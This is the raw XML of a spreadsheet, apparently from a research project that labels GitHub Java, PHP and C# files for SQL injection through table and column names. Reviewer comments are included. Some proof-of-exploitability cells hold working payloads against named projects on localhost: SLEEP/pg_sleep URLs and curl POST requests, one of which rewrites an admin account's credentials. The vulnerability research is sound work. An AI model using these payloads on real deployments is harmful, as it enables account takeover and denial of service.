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pivotTables/pivotTable2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.pivotTable+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18"/>
  <workbookPr hidePivotFieldList="1" defaultThemeVersion="166925"/>
  <xr:revisionPtr revIDLastSave="3828" documentId="11_E60897F41BE170836B02CE998F75CCDC64E183C8" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{61879183-4035-453E-9D50-5F517DD00CEA}"/>
  <bookViews>
    <workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010" firstSheet="2" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Java" sheetId="1" r:id="rId1"/>
    <sheet name="PHP" sheetId="2" r:id="rId2"/>
    <sheet name="C#-Parisa" sheetId="3" r:id="rId3"/>
    <sheet name="C#-Gabriel" sheetId="4" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="NopCommerceStore">'C#-Gabriel'!$K$19</definedName>
  </definedNames>
  <calcPr calcId="191028" calcCompleted="0"/>
  <pivotCaches>
    <pivotCache cacheId="10402" r:id="rId5"/>
    <pivotCache cacheId="10403"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5" i="3" l="1"/>
  <c r="F61" i="3"/>
  <c r="F62" i="3"/>
  <c r="E62" i="3"/>
  <c r="E61" i="3"/>
  <c r="D57" i="3"/>
  <c r="D56" i="3"/>
  <c r="J140" i="4"/>
  <c r="J137" i="4"/>
  <c r="F95" i="4"/>
  <c r="F93" i="4"/>
  <c r="I104" i="4"/>
  <c r="H104" i="4"/>
  <c r="G104" i="4"/>
  <c r="F104" i="4"/>
  <c r="I103" i="4"/>
  <c r="H103" i="4"/>
  <c r="G103" i="4"/>
  <c r="F103" i="4"/>
  <c r="I102" i="4"/>
  <c r="H102" i="4"/>
  <c r="G102" i="4"/>
  <c r="F102" i="4"/>
  <c r="I101" i="4"/>
  <c r="H101" i="4"/>
  <c r="G101" i="4"/>
  <c r="F101" i="4"/>
  <c r="I97" i="4"/>
  <c r="I98" i="4"/>
  <c r="I99" i="4"/>
  <c r="H99" i="4"/>
  <c r="H98" i="4"/>
  <c r="H97" i="4"/>
  <c r="H100" i="4" s="1"/>
  <c r="G99" i="4"/>
  <c r="G98" i="4"/>
  <c r="G97" i="4"/>
  <c r="G100" i="4" s="1"/>
  <c r="F99" i="4"/>
  <c r="F98" i="4"/>
  <c r="F97" i="4"/>
  <c r="F100" i="4" s="1"/>
  <c r="G95" i="4"/>
  <c r="I95" i="4"/>
  <c r="I94" i="4"/>
  <c r="I93" i="4"/>
  <c r="I96" i="4" s="1"/>
  <c r="H95" i="4"/>
  <c r="H94" i="4"/>
  <c r="H93" i="4"/>
  <c r="H96" i="4" s="1"/>
  <c r="G94" i="4"/>
  <c r="G93" i="4"/>
  <c r="G96" i="4" s="1"/>
  <c r="F94" i="4"/>
  <c r="G143" i="4"/>
  <c r="D145" i="4"/>
  <c r="D144" i="4"/>
  <c r="G146" i="4"/>
  <c r="D159" i="4"/>
  <c r="D158" i="4"/>
  <c r="D157" i="4"/>
  <c r="D156" i="4"/>
  <c r="D147" i="4"/>
  <c r="D146" i="4"/>
  <c r="D148" i="4"/>
  <c r="G145" i="4"/>
  <c r="G144" i="4"/>
  <c r="G150" i="4"/>
  <c r="D143" i="4"/>
  <c r="I100" i="4" l="1"/>
  <c r="D163" i="4"/>
  <c r="D164" i="4" l="1"/>
  <c r="D165" i="4"/>
  <c r="J105" i="4"/>
  <c r="F9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tc={D2C25AD5-A4B3-4AA8-9B47-C0468575435E}</author>
    <author>tc={53E1BA1E-D85B-4061-928D-CEC9ABA07CFF}</author>
    <author>tc={F9940F82-4288-46FB-9D87-D0CE32CE05A7}</author>
    <author>tc={C8025E31-08D4-4E51-8B3E-02BAB3EBF174}</author>
    <author>tc={833103F9-F07A-4AE5-97F6-C9971FF4E38D}</author>
    <author>tc={ABAC31AB-9847-4B98-BE24-17690196835A}</author>
  </authors>
  <commentList>
    <comment ref="C5" authorId="0" shapeId="0" xr:uid="{D2C25AD5-A4B3-4AA8-9B47-C0468575435E}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    This project looks like a web app because of the aspx and css files in the folder NopCommerceStore</t>
      </text>
    </comment>
    <comment ref="C6" authorId="1" shapeId="0" xr:uid="{53E1BA1E-D85B-4061-928D-CEC9ABA07CFF}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    I can't really tell what type of interface this project has, my guess would be web app</t>
      </text>
    </comment>
    <comment ref="C7" authorId="2" shapeId="0" xr:uid="{F9940F82-4288-46FB-9D87-D0CE32CE05A7}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    According to the readme, this project is a digital experience platform, an integrated set of technologies designed to enable the composition, management, delivery and optimization of contextualized digital experiences across multiexperience customer journeys. I labelled this project as Library/Framework.</t>
      </text>
    </comment>
    <comment ref="C13" authorId="3" shapeId="0" xr:uid="{C8025E31-08D4-4E51-8B3E-02BAB3EBF174}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    I believe this project contains files for a game made with Unity3D. There are many game-related files in the War/Client/Assets folder. I labelled this project as Standalone app.</t>
      </text>
    </comment>
    <comment ref="C15" authorId="4" shapeId="0" xr:uid="{833103F9-F07A-4AE5-97F6-C9971FF4E38D}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    This one is a library/framework. The documentation on https://code.google.com/archive/p/nohros-must/
states
"This project contains several of Nohros' core .NET libraries that we use in our many .NET-based projects."</t>
      </text>
    </comment>
    <comment ref="D16" authorId="5" shapeId="0" xr:uid="{ABAC31AB-9847-4B98-BE24-17690196835A}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Based on the name of the repo ("GroupProject223"), this is probably a student project.</t>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1692" uniqueCount="653">
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>Interface Type</t>
  </si>
  <si>
    <t>Author Skill Level</t>
  </si>
  <si>
    <t>Line Number</t>
  </si>
  <si>
    <t>SQL Usage</t>
  </si>
  <si>
    <t>Exploitable?</t>
  </si>
  <si>
    <t>Proof of Exploitability</t>
  </si>
  <si>
    <t>Time Spent</t>
  </si>
  <si>
    <t>Other Comments</t>
  </si>
  <si>
    <t>https://github.com/bearddan2000/java-cli-sbt-cockroachdb-single-node-without-ssl-data-type-json/raw/77afa0459cace21f3b6109317beda41e7097fd81/java-srv/bin/src/main/java/example/db/print/DBTablePrinter.java</t>
  </si>
  <si>
    <t>Web</t>
  </si>
  <si>
    <t>Tutorial/Beginner</t>
  </si>
  <si>
    <t>Table Name</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Hardcoded</t>
  </si>
  <si>
    <t>Very simple example; no safety measures in place</t>
  </si>
  <si>
    <t>https://github.com/EnWaffel/random-utilities/raw/d311b6069258f81140c78b7b19a83cc0c2b4d5c5/utils/src/main/java/de/enwaffel/randomutils/sql/MySQL.java</t>
  </si>
  <si>
    <t>Library</t>
  </si>
  <si>
    <t>Other/Professional</t>
  </si>
  <si>
    <t>Table Name, Column Name, Values</t>
  </si>
  <si>
    <t>Unprotected Library</t>
  </si>
  <si>
    <t>No mitigations (prepared statements "called", not used)</t>
  </si>
  <si>
    <t>https://github.com/snava10/cubanews/raw/452083fafa1f1ea67959eba3a9f0170446a584f9/crawler/src/main/java/com/snava/cubanews/data/access/SqliteMetadataDatabase.java</t>
  </si>
  <si>
    <t>Uses prepared statements correctly everywhere else</t>
  </si>
  <si>
    <t>https://github.com/ctapweb/ctap-api/raw/ce5d61e96e6379eff5efa00a13bda785d956c1a4/src/main/java/com/ctapweb/api/db/operations/TextTableOperations.java</t>
  </si>
  <si>
    <t>Order by column</t>
  </si>
  <si>
    <t>No mitigations for the SQLIDIAs (prepared statements elsewhere)</t>
  </si>
  <si>
    <t>https://github.com/hongdp/pa6_sksnf4gf1or/raw/5fa7bb8d572618f72d1d7869262183de871ffe66/hadoop-example/src/mapred/org/apache/hadoop/mapred/lib/db/DBInputFormat.java</t>
  </si>
  <si>
    <t>Stand-alone</t>
  </si>
  <si>
    <t>Student</t>
  </si>
  <si>
    <t>Table name, order by</t>
  </si>
  <si>
    <t>Appears to be a collection of student exercises, but I'm not really sure</t>
  </si>
  <si>
    <t>https://github.com/cis423-team1/gps_with_friends/raw/dd3e7e707a86c4bccbd387fe06f5f23511e48ed2/mysql-connector-java-5.1.25/src/testsuite/regression/MetaDataRegressionTest.java</t>
  </si>
  <si>
    <t>SQLIA vulnerable</t>
  </si>
  <si>
    <t>https://github.com/luigiiorio30/symbian_linuxbuild/raw/bdefc3a2a2599a8cfc4281aaff996eeadbcdb27c/buildframework/helium/tools/common/java/src/com/nokia/fmpp/SqlDataLoader.java</t>
  </si>
  <si>
    <t>Build System</t>
  </si>
  <si>
    <t>Table name</t>
  </si>
  <si>
    <t>Not web app</t>
  </si>
  <si>
    <t>https://github.com/greatzhb/corejava2/raw/95da5c2262c6a2472c0292bb13fd7d26943ebca2/v2ch05/view/ViewDB.java</t>
  </si>
  <si>
    <t>https://github.com/LuCEresearchlab/splashe-22-expressions-java/raw/b60d3a51a5d6312de24f127434f0c676630dcd3a/expression-service/java/ch/usi/inf/luce/expr/analyzer/stats/ExprStatsTable.java</t>
  </si>
  <si>
    <t>Table and Column</t>
  </si>
  <si>
    <t>https://github.com/triannisa/Categorize-Data-From-CSV-file-to-PostgreSQL/raw/0c7173b8416784ccbe97e6fec73920cf4a1a3950/csvtopostgresql/src/main/java/csvtopostgresql/DisplayData.java</t>
  </si>
  <si>
    <t>https://github.com/yangzilong1986/zhan-cms/raw/bc5a5c6e0561fd7b0e4e1557a310119e53f55041/FirestormTemp/src/zt/cms/xf/common/jdbc/XfcontractDaoImpl.java</t>
  </si>
  <si>
    <t>Table Name and Column</t>
  </si>
  <si>
    <t>https://github.com/metasfresh/metasfresh/raw/f008bbbd80de973b352e94ef34ff98d635b99ed5/backend/de.metas.adempiere.adempiere/base/src/main/java/de/metas/i18n/po/POTrlRepository.java</t>
  </si>
  <si>
    <t>https://github.com/bbrand84/datamerge/raw/d90d598bf2be3c7e1068d6f56e15dafd58147f38/de.yunx.datamerge/src/main/java/de/yunx/datamerge/measures/frequency/Patstat_411_Freq_IPLytics.java</t>
  </si>
  <si>
    <t>Not web app, probably SQLIA vulnerable</t>
  </si>
  <si>
    <t>https://github.com/NinoMolina/metalurgica/raw/fa74c1b76121e0e69b14be41c89eb017088347bf/10_metalsoft/MetalSoft_Desktop/src/metalsoft/datos/dao/MpasignadaxpiezarealDAOImpl.java</t>
  </si>
  <si>
    <t>https://github.com/timgdavies/backend/raw/6995d17f67f627d28a7c1a048fd12004b930e3c5/digiwhist-dataaccess/src/main/java/eu/digiwhist/dataaccess/dao/jdbc/JdbcMatchedTenderDAO.java</t>
  </si>
  <si>
    <t>https://github.com/harshaJha18/CS636-Database-Application-Development/raw/bfab7e849261d6bc9513cd94b919ef846fb7db0d/pizza1S/src/main/java/cs636/pizza/dao/AdminDAO.java</t>
  </si>
  <si>
    <t>Likely SQLIA vulnerable</t>
  </si>
  <si>
    <t>https://github.com/martahilmar/gsn-rasip/raw/87703d9a079d2b0d4aa55649c9c99829645bd230/src/gsn/simulation/QueryGenerator.java</t>
  </si>
  <si>
    <t>Unsure</t>
  </si>
  <si>
    <t>Ran out of time getting to run; old java version due to 10 year old project</t>
  </si>
  <si>
    <t>https://github.com/GeekBrainsStudent/java3/raw/7c0c7a70029cdffb62cb8f30ee9d9f1c55699f24/lesson2/src/main/java/database/QueryDB.java</t>
  </si>
  <si>
    <t>https://github.com/kenankd/RPR_Project/raw/0cebfd35fb4e41914f47f9518862a75212e2462c/src/main/java/ba/unsa/etf/rpr/dao/AbstractDao.java</t>
  </si>
  <si>
    <t>https://github.com/Meiyerlove/teaching/raw/d22d0c007f0d03376bc20565d15433c082372b05/src/com/cxjava/action/StudentInfoManagerDao.java</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>http://localhost:8080/teaching/FindStudentInfo?sortname=SLEEP(1000)%20--%20&amp;page=1&amp;rp=1&amp;roleid=1&amp;sortorder=1&amp;query=&amp;qtype=</t>
  </si>
  <si>
    <t>https://github.com/SpeciesDecipit/Thesis-PML-DL/raw/f11b4b30cdf034a69625db3ba6249bcc479f7049/data/code/java/negative_sample/DatabaseShardManager.java</t>
  </si>
  <si>
    <t>Create tables, columns</t>
  </si>
  <si>
    <t>Really odd, massive project; might be analyzing random code using Python</t>
  </si>
  <si>
    <t>https://github.com/Eg-Krutalevich/KP/raw/4369226d4ca8ec9a490ef4d16d619493785985e7/Server/src/tables/VacancyTable.java</t>
  </si>
  <si>
    <t>Client-Server</t>
  </si>
  <si>
    <t>Almost certainly SQLIA vulnerable</t>
  </si>
  <si>
    <t>https://github.com/BETAJIb/ikol/raw/f3709ea10be2d155b0bf1dee487f53c723f570cf/L2J_Mobius_7.0_PreludeOfWar/java/org/l2jmobius/tools/dbinstaller/util/mysql/DBDumper.java</t>
  </si>
  <si>
    <t>Table name/column names</t>
  </si>
  <si>
    <t>Dynamically verified</t>
  </si>
  <si>
    <t>Almost certainly SQLIA (second-order) vulnerable (it's a database copying util/library that's part of game?)</t>
  </si>
  <si>
    <t>https://github.com/myfosse/University-6_sem_sake_tasks_1_6/raw/5a981321526107092ad4101a54af4f40e2bd4a2e/src/main/java/dao/sql/DatabaseHandler.java</t>
  </si>
  <si>
    <t>Table, column</t>
  </si>
  <si>
    <t>https://github.com/kosmas1991/MusicDB/raw/798e11fb5f5210a6541ae96278a31c5865058478/src/model/DataSource.java</t>
  </si>
  <si>
    <t>https://github.com/EntropyTeam/entropy-pf/raw/8d0e08641e1a40f87ad2e77a08a87daa8c45ea53/producto/trunk/Entropy_Profesor/src/backend/dao/dise%C3%B1os/DAOInstitucion.java</t>
  </si>
  <si>
    <t>https://github.com/Biblivre/Biblivre-5/raw/f7d3bf44d4c7bb555d4e83c17df6cdf25b4a4e90/src/java/biblivre/administration/indexing/IndexingGroupsDAO.java</t>
  </si>
  <si>
    <t>Table</t>
  </si>
  <si>
    <t>https://github.com/URMC/i2b2/raw/29f26382db8419a95a1119fc665a3c3f6c404765/server/edu.harvard.i2b2.crc/src/server/edu/harvard/i2b2/crc/dao/pdo/PageTotalDao.java</t>
  </si>
  <si>
    <t>https://github.com/curtiszimmerman/TellFinder/raw/5fa920ca5b24f8ca87e35400eeccf55fda75aa7e/src/oculus/memex/rest/ServerResource.java</t>
  </si>
  <si>
    <t>TAble</t>
  </si>
  <si>
    <t>https://github.com/Atreus1125/PlantMore/raw/db5b4cb74a6e33f80d94d0f287d3db222a75536d/src/shop/dao/impl/GoodsDAOImpl.java</t>
  </si>
  <si>
    <t>http://localhost:8080/pages/front/goods/GoodsServletFront/list?col=SLEEP(1000)%20OR%20?%20=%20?%20OR%20?%20=%20?%20--</t>
  </si>
  <si>
    <t>https://github.com/cgc-carbon/CGC_ERP/raw/a2ac0f6c25a9bda04a0933c980948f13b8814017/src/java/com/cgc/DB/D_product_receive_track_detailDAO.java</t>
  </si>
  <si>
    <t>https://github.com/firedevelop/Programming/raw/920f88348633affc5892b60f8b83c74fafb9ada7/Java/TimBuchalka/Java_MasterClass_0262_020/src/com/timbuchalka/model/Datasource.java</t>
  </si>
  <si>
    <t>https://github.com/phenoscape/phenoscape-nlp/raw/6522bcd2d15ada4c904ff4601a12ece16840c64a/parsing-gui/src/fna/db/HabitatParserDbAccessor.java</t>
  </si>
  <si>
    <t>Table, column, order by</t>
  </si>
  <si>
    <t>Dead code</t>
  </si>
  <si>
    <t>https://github.com/xfifix/SEO_REPO/raw/2dbb840b03e85c98f1339f60967670dcbc71aacf/SIMILARITY_METRICS/src/vsm/InsideMagasinSimilarityWorkerThread.java</t>
  </si>
  <si>
    <t>Column</t>
  </si>
  <si>
    <t>Config File</t>
  </si>
  <si>
    <t>https://github.com/liuhuiAndroid/tcc-transaction-master-1.2.x/raw/6bc383e4121325861bae56840348ac2fa4187759/tcc-transaction-core/src/main/java/org/mengyun/tcctransaction/repository/JdbcTransactionRepository.java</t>
  </si>
  <si>
    <t>Table Prefix</t>
  </si>
  <si>
    <t>https://github.com/victorst79/DAW-Java-Works/raw/a28a55daad7593305024f04f5b52e3185d9b958d/Agenda/src/AgendaBD.java</t>
  </si>
  <si>
    <t>https://github.com/gy0531/jsprun/raw/b350aab4296d3b18fda61528ba861ce03d61b7c3/src/cn/jsprun/service/AdvSetService.java</t>
  </si>
  <si>
    <t>http://localhost:8080/jsprun/other.do?action=adv&amp;orderby=SLEEP(1000)</t>
  </si>
  <si>
    <t>https://github.com/vitorwolski/security-updates/raw/a326890b26eb2ee7fa1796972b3fe33444b59044/lib/quartz-2.3.0/src/org/quartz/impl/jdbcjobstore/SimplePropertiesTriggerPersistenceDelegateSupport.java</t>
  </si>
  <si>
    <t>https://github.com/barrycom/kgmx/raw/f2ad7902d06d36fdb908c6c098f36c978907b05f/src/com/jetcms/cms/dao/assist/impl/CmsSqlserverDataBackDaoImpl.java</t>
  </si>
  <si>
    <t>Probably</t>
  </si>
  <si>
    <t>Almost certainly vulnerable, but this is the WORST code project I've ever seen (hyperbolic, but still...)</t>
  </si>
  <si>
    <t>https://github.com/svn2github/s2container/raw/625adc6c4e1396654a7297d00ec206c077a78696/tags/2009-05-19/seasar2-2.4.37/s2jdbc-gen/s2jdbc-gen/src/main/java/org/seasar/extension/jdbc/gen/internal/version/SchemaInfoTableImpl.java</t>
  </si>
  <si>
    <t>https://github.com/a2531509/eracloud_jx/raw/c2b4ff07e4ba6d4f4c09e56454720e2003df038d/src/com/erp/util/CreateBean.java</t>
  </si>
  <si>
    <t>https://github.com/maximilianocorrea/libertya/raw/780a87ef4a76e6c36cd64ee07466e52ca1921b1d/FreeQueryBuilder/nickyb/fqb/nickyb/fqb/DialogCount.java</t>
  </si>
  <si>
    <t>Appears to be a graphical DB tool, so takes tablename directly from user (the user presumably owns the DB though...)</t>
  </si>
  <si>
    <t>https://github.com/Biplon/PlayertoSQL/raw/8123e8efe368747ff0f7a4f51d66ec288ef8e712/src/pts/java/database/DatabaseManager.java</t>
  </si>
  <si>
    <t>Minecraft plugin/mod</t>
  </si>
  <si>
    <t>https://github.com/evgenymalishevskiy/JD2018-11-13-000/raw/4c7673a49f065a87e57e3125b378f382440a4163/src/by/it/naumenko/jd03_03/MyDAO.java</t>
  </si>
  <si>
    <t>Probably SQLIA</t>
  </si>
  <si>
    <t>https://github.com/SumeetMoray/Nearby-Shops-API-Deprecated/raw/ce04e4ced3bb8d40805fcff053b3cd6b125e8737/api/src/main/java/org/nearbyshops/DAOsPreparedRoles/EndUserDAONew.java</t>
  </si>
  <si>
    <t>http://localhost:5000/api/v1/EndUser?SortBy=1;%20SELECT%20pg_sleep(20)%20--%20&amp;Limit=10&amp;Offset=0</t>
  </si>
  <si>
    <t>Piggybacking. Interesting DB stuff compared to our usual here, since it's postgres</t>
  </si>
  <si>
    <t>https://github.com/LukaOrlovic/TicTacToe/raw/bed0b300a81e286971ab44348c66b2067772a0d1/TicTacToeServerApplication/src/brokerBazePodataka/BrokerBazePodataka1.java</t>
  </si>
  <si>
    <t>https://github.com/Morphage/jSCAPE/raw/2d2817be3d5f5ddaea17a3e449303ef39c66a729/jSCAPE%20AdminTool/src/jscape/database/StudentTable.java</t>
  </si>
  <si>
    <t>https://github.com/YQmomo/supervise/raw/8fc9205cb803164533a373585abf7b1b92e74e19/gov.df.fap/gov.df.fap.service/src/main/java/gov/df/fap/service/portal/impl/IPaginationServiceImpl.java</t>
  </si>
  <si>
    <t>Ran out of time. Terrible, ancient code</t>
  </si>
  <si>
    <t>https://github.com/Java-Camp/Back-end/raw/533874b537f805716dfe83f9b72306c4cda8dd7b/src/main/java/com/jcf/orm/sql/EntityDAO.java</t>
  </si>
  <si>
    <t>https://github.com/Nwanda/jforum/raw/4d883758e039ae388375d72901a0b2802f90217e/src/net/jforum/dao/generic/GenericKarmaDAO.java</t>
  </si>
  <si>
    <t>Totally vulnerable, just in Dead code</t>
  </si>
  <si>
    <t>Count of Interface Type</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Build System Total</t>
  </si>
  <si>
    <t>Client-Server Total</t>
  </si>
  <si>
    <t>Library Total</t>
  </si>
  <si>
    <t>Stand-alone Total</t>
  </si>
  <si>
    <t>Web Total</t>
  </si>
  <si>
    <t>=COUNTIFS($C$1:$C$386, "Web app", $D$1:$D$386, "Professional", $F$1:$F$386, 'Java'!J63 $G$1:$G$386, "SQL-IA")</t>
  </si>
  <si>
    <t>Proof</t>
  </si>
  <si>
    <t>https://github.com/pratik210594/foodorderingsystem/raw/e5b28a447621b248c7f5189926d6708cd5d284f4/FoodOrderingSystem/orderplaced.php</t>
  </si>
  <si>
    <t>Create table, table name</t>
  </si>
  <si>
    <t>Click order after visiting http://localhost/foodorderingsystem/foodorder.php?username=test100+AS+SELECT+SLEEP(100)+--+&amp;mobileno=asd&amp;usertype=Customer#hero</t>
  </si>
  <si>
    <t>This is not exploitable using SQLMap! It fails to find it</t>
  </si>
  <si>
    <t>https://github.com/dimas071/REST-API-CRUD/raw/8b27d130390bec829effd1989a3e76d1673c8a63/rest/api/Rest.php</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>https://github.com/raj9785/jamboree_singapore/raw/45b659326e16c3952b06619f11b01b65443648bb/apis/include/DbHandler.php</t>
  </si>
  <si>
    <t>Column Name</t>
  </si>
  <si>
    <t>https://github.com/chslava/amed/raw/b6cd944f6f36a840d3dcfe7e357a6de54d1438fb/shop/svs/veikals/dzest_ok.php</t>
  </si>
  <si>
    <t>DELETE FROM</t>
  </si>
  <si>
    <t>Hardcoded config</t>
  </si>
  <si>
    <t>https://github.com/nezucloud/php-references/raw/4d5d1bab6d17b4b44765f0f00921313903cc3c27/private/query_functions.php</t>
  </si>
  <si>
    <t>Table name, hardcoded</t>
  </si>
  <si>
    <t>https://github.com/sicommnend/SMD-1.0/raw/a6cdb750e050732572b2019e2fe86ea5271a4ad5/Sources/Subs-Db-mysql.php</t>
  </si>
  <si>
    <t>https://github.com/asad-cuet/PHP-Learn-2/raw/7970f700b05e7bb0c2c09ad0f4f8b1f74a315628/i_portfolio/admin/function.php</t>
  </si>
  <si>
    <t>Table and column names</t>
  </si>
  <si>
    <t>No. Other locations correctly use escaping</t>
  </si>
  <si>
    <t>Dead code, vulnerable</t>
  </si>
  <si>
    <t>https://github.com/kahap/justtesting/raw/acf91fa81155e1b146160ac3c28bb6ae3091c8c0/admin_advanced/cls/API.cls.php</t>
  </si>
  <si>
    <t>No, barely. Can't exploit due to extremely limited syntax at the position (any small change would have it exploitable). Would be exploited with piggy backing. Syntax errors may leak db_name, and leak information elsewhere</t>
  </si>
  <si>
    <t>Might want to make this a special case!</t>
  </si>
  <si>
    <t>https://github.com/miningchat/miningchat/raw/6ec9f371f739614710447f73bd016d72b3af1e61/modules/requires/create_users_table.php</t>
  </si>
  <si>
    <t>5,8, others</t>
  </si>
  <si>
    <t>No, hardcoded</t>
  </si>
  <si>
    <t>https://github.com/lixin-wei/XiaoShanBigScreen/raw/a3acfc33c046b322f6e81cb96847483f4c3c7d27/php/mysqlAll.php</t>
  </si>
  <si>
    <t>No to SQLIDIA</t>
  </si>
  <si>
    <t>Vulnerable to SQLIA, not IDIA</t>
  </si>
  <si>
    <t>https://github.com/WajihaNiazi/finalproject/raw/e4b8f53f37c79404a7422b6c98f5608823415f8d/lib/crud.php</t>
  </si>
  <si>
    <t>5 and more</t>
  </si>
  <si>
    <t>https://github.com/disit/snap4city/raw/6fd64fa9f107779420d92098b4f76e77340778a2/Heatmap/odft/od/trajectories_clusters.php</t>
  </si>
  <si>
    <t>Order by column name</t>
  </si>
  <si>
    <t>localhost/snap4city/Heatmap/odft/od/trajectories_clusters.php?orderby=SLEEP(1000)%20--</t>
  </si>
  <si>
    <t>https://github.com/iwright4317/PIP/raw/c3ec02dc38a4d36332e660be27f040a2178a4449/PreviewDN2_Copy.php</t>
  </si>
  <si>
    <t>https://github.com/osaeris/epmanager3/raw/20652c1e18ebbc97d4cd650a2f1158b7afc8aafc/usr/share/epmanager3/userfunctions.php</t>
  </si>
  <si>
    <t>Table Name in update</t>
  </si>
  <si>
    <t>curl 'http://localhost/epmanager3/usr/share/epmanager3/singlecreate.php' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Referer: http://localhost/epmanager3/usr/share/epmanager3/singlecreate.php' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=32gs59nop6c79c4dmk7c3qtilo' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'studentlist%5B%5D=%2F%2A%27%20or%201%3D1%20--%20%2F%2A%2A%2F%20ep_admins%20SET%20user_login%3D%27admin%27%2Cuser_pass%3D%27268e40h1kibuo%27%2Cuser_nicename%3D%27administrator%27%2Cuser_status%3D2%20WHERE%20user_id%3D1%20--%20&amp;create=create+portfolio%21&amp;action=submitted&amp;studentid=a&amp;lecturer=b&amp;adminpass=c&amp;courseid=&amp;courseblock=&amp;courseocc='</t>
  </si>
  <si>
    <t>Takes some bypassing of filters; vulnerable elsewhere due to lack of filters in some API calls</t>
  </si>
  <si>
    <t>https://github.com/Hrant75/Homeworks/raw/95da29b748234034f2b53bcee46951375099ccd1/Homework24/engine.php</t>
  </si>
  <si>
    <t>https://github.com/kleitz/cargoking/raw/4df532546162d8b3632b93e8b868f38e5eb76a48/biya4u/utilities.php</t>
  </si>
  <si>
    <t>Lots of syntax errors, nonsensical code</t>
  </si>
  <si>
    <t>https://github.com/adamzedd617/Event-website-fullSystem/raw/b20938fcb81d627eeb7ddacb18886edd0670eb94/admin/search.php</t>
  </si>
  <si>
    <t>curl 'http://localhost/Event-website-fullSystem/admin/search.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Referer: http://localhost/Event-website-fullSystem/admin/search.php' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=32gs59nop6c79c4dmk7c3qtilo' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'users=aa&amp;city=&amp;email=aaa&amp;user=(SELECT SLEEP(10000)) as t -- '</t>
  </si>
  <si>
    <t>SQLMap could not detect; login was broken</t>
  </si>
  <si>
    <t>https://github.com/kartiksoni/digibook/raw/6cf80996d3b8c41a63d084a3079fe6483c416039/product/pharmacy/view-prescription.php</t>
  </si>
  <si>
    <t>https://github.com/15Faiq/projek_pkl/raw/bc38b5cf91e814effedaa27b370545e7709ad7b9/code%20crud/table-siswa.php</t>
  </si>
  <si>
    <t>Order by column name using new definition</t>
  </si>
  <si>
    <t>curl 'http://localhost/projek_pkl/code%20crud/table-siswa.php' -X POST -F "search[value]=a" -F "order[0][column]=0" -F "order[0][dir]=, (SELECT SLEEP(10000))"</t>
  </si>
  <si>
    <t>https://github.com/ibmhndr/PraktikumWebC/raw/e1fbefb21441d18b9b944ba9fac7feec71fc1f38/FINAL%20PROJECT/homemhs.php</t>
  </si>
  <si>
    <t>Order by and column in where</t>
  </si>
  <si>
